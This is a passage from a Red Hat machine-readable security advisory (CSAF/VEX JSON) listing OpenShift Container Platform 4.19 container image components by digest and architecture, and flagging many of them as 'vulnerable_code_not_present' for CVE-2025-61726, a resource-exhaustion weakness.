"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
